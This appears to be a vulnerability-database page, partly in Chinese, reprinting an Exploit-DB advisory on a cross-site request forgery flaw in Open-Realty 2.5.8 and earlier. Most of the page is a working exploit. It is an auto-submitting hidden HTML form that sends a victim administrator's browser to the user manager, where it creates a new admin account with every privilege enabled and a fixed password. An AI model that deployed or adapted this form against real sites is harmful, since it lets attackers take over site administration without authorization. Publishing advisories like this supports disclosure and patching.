Open-Realty 2.5.8 - Cross-Site Request Forgery

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1064451 漏洞类型
发布时间 2012-11-16 更新时间 2012-11-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/38037
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/56580/info

Open-Realty is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions and gain access to the affected application. Other attacks are also possible.

Open-Realty 2.5.8 and prior versions are vulnerable; other versions may also be affected. 

<!-- Add Admin User --> 
 <form 
action="http://localhost/orealty/admin/index.php?action=user_manager" 
method="POST">
      <input type="hidden" name="action" value="createNewUser" />
      <input type="hidden" name="edit_user_name" value="user" />
      <input type="hidden" name="edit_user_pass" 
value="pa55w0rd" />
      <input type="hidden" name="edit_user_pass2" 
value="pa55w0rd" />
      <input type="hidden" name="user_first_name" value="hacker" 
/>
      <input type="hidden" name="user_last_name" value="smith" 
/>
      <input type="hidden" name="user_email" 
value="hacker@yehg.net" />
      <input type="hidden" name="edit_active" value="yes" />
      <input type="hidden" name="edit_isAdmin" value="yes" />
      <input type="hidden" name="edit_isAgent" value="yes" />
      <input type="hidden" name="limitListings" value="-1" />
      <input type="hidden" name="edit_limitFeaturedListings" 
value="-1" />
      <input type="hidden" name="edit_userRank" value="0" />
      <input type="hidden" name="edit_canEditAllListings" 
value="yes" />
      <input type="hidden" name="edit_canEditAllUsers" value="yes" 
/>
      <input type="hidden" name="edit_canEditSiteConfig" value="yes" 
/>
      <input type="hidden" name="edit_canEditMemberTemplate" 
value="yes" />
      <input type="hidden" name="edit_canEditAgentTemplate" 
value="yes" />
      <input type="hidden" name="edit_canEditPropertyClasses" 
value="yes" />
      <input type="hidden" name="edit_canEditListingTemplate" 
value="yes" />
      <input type="hidden" name="edit_canViewLogs" value="yes" />
      <input type="hidden" name="edit_canModerate" value="yes" />
      <input type="hidden" name="edit_canFeatureListings" 
value="yes" />
      <input type="hidden" name="edit_canEditListingExpiration" 
value="yes" />
      <input type="hidden" name="edit_canExportListings" value="no" 
/>
      <input type="hidden" name="edit_canPages" value="yes" />
      <input type="hidden" name="edit_canVtour" value="yes" />
      <input type="hidden" name="edit_canFiles" value="yes" />
      <input type="hidden" name="edit_canUserFiles" value="yes" />
      <input type="hidden" name="edit_canManageAddons" value="yes" 
/>
      <script>document.forms[0].submit()</script>
    </form>